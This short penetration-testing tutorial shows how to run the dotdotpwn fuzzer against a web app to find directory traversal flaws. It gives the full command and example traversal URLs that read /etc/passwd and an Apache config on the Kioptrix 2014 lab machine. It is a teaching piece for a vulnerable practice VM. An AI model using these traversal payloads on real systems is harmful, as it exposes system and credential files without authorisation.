So you have researched your web app and have found that it is possible that it is vulnerable to directory traversal attacks. Very often the path to the initial point of the directory traversal is given in the exploit guide. If it isn’t however you can potentially use the dotdotpwn script to find a potential directory traversal.

For example:

cd /usr/share/dotdotpwn
dotdotpwn -m http-url -u http://(IPorDomainName)/examples/index.php?Action=View\&Script=/TRAVERSAL -k "root:" -o unix

 

-m sets the module to be http-url

-u gives the URL to be tested. The word TRAVERSAL is used in the script for the start point of the testing.

-k searches for the word “root”

-o sets the operating system to unix, this information should be available from the NMap scan of the target.

Running this will dotdotpwn to fuzz through a number of options to find directories that can be traversed  to. For example:

http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../usr/local/etc/apache22/httpd.conf

http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../etc/passwd

The examples above can be found by attacking the Kioptrix 2014 vulnerable machine on vulnhub.

For further information on dotdotpwn:

https://github.com/wireghoul/dotdotpwn

or run the following command in the terminal for the help menu

perl dotdotpwn.pl -h